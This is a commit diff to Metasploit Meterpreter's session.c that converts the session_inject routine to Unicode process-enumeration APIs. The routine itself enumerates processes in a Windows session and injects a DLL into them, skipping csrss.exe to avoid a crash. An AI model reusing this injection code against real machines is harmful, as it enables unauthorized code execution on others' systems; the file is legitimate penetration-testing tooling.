Process Unicode support

2025-03-24 18:16:24 +01:00 · 2020-04-05 11:52:08 +08:00 · 2020-04-05 11:52:08 +08:00 · a8df9b3604
commit a8df9b3604
parent 348aa69f68
1 changed files with 10 additions and 10 deletions
--- a/c/meterpreter/source/extensions/stdapi/server/sys/session.c
+++ b/c/meterpreter/source/extensions/stdapi/server/sys/session.c
@ -114,13 +114,13 @@ DWORD session_inject( DWORD dwSessionId, DLL_BUFFER * pDllBuffer, char * cpComma
 {
 	DWORD dwResult                                     = ERROR_INVALID_HANDLE;
 	CREATETOOLHELP32SNAPSHOT pCreateToolhelp32Snapshot = NULL;
-	PROCESS32FIRST pProcess32First                     = NULL;
-	PROCESS32NEXT pProcess32Next                       = NULL;
+	PROCESS32FIRSTW pProcess32FirstW                     = NULL;
+	PROCESS32NEXTW pProcess32NextW                     = NULL;
 	HANDLE hProcessSnap                                = NULL;
 	HMODULE hKernel                                    = NULL;
 	HANDLE hToken                                      = NULL;
 	BOOL bUseBruteForce                                = TRUE;
-	PROCESSENTRY32 pe32                                = {0};
+	PROCESSENTRY32W pe32                                = {0};

 	do
 	{
@ -146,19 +146,19 @@ DWORD session_inject( DWORD dwSessionId, DLL_BUFFER * pDllBuffer, char * cpComma
 			break;

 		pCreateToolhelp32Snapshot = (CREATETOOLHELP32SNAPSHOT)GetProcAddress( hKernel, "CreateToolhelp32Snapshot" );
-		pProcess32First           = (PROCESS32FIRST)GetProcAddress( hKernel, "Process32First" );
-		pProcess32Next            = (PROCESS32NEXT)GetProcAddress( hKernel, "Process32Next" );
+		pProcess32FirstW           = (PROCESS32FIRSTW)GetProcAddress( hKernel, "Process32FirstW" );
+		pProcess32NextW            = (PROCESS32NEXTW)GetProcAddress( hKernel, "Process32NextW" );

-		if( !pCreateToolhelp32Snapshot || !pProcess32First || !pProcess32Next )
+		if( !pCreateToolhelp32Snapshot || !pProcess32FirstW || !pProcess32NextW )
 			break;

 		hProcessSnap = pCreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
 		if( hProcessSnap == INVALID_HANDLE_VALUE )
 			break;

-		pe32.dwSize = sizeof( PROCESSENTRY32 );
+		pe32.dwSize = sizeof( PROCESSENTRY32W );

-		if( !pProcess32First( hProcessSnap, &pe32 ) )
+		if( !pProcess32FirstW( hProcessSnap, &pe32 ) )
 			break;
 				
 		bUseBruteForce = FALSE;
@ -169,7 +169,7 @@ DWORD session_inject( DWORD dwSessionId, DLL_BUFFER * pDllBuffer, char * cpComma
 			{
 				// On Windows 2008R2 we Blue Screen the box if we inject via APC injection 
 				// into the target sessions instance of csrss.exe!!! so we filter it out...
-				if( strstr( pe32.szExeFile, "csrss.exe" ) )
+				if (wcsstr(pe32.szExeFile, L"csrss.exe"))
 					continue;

 				dwResult = ps_inject( pe32.th32ProcessID, pDllBuffer, cpCommandLine );
@ -179,7 +179,7 @@ DWORD session_inject( DWORD dwSessionId, DLL_BUFFER * pDllBuffer, char * cpComma
 					break;
 				}
 			}
-		} while( pProcess32Next( hProcessSnap, &pe32 ) );
+		} while( pProcess32NextW( hProcessSnap, &pe32 ) );

 	} while( 0 );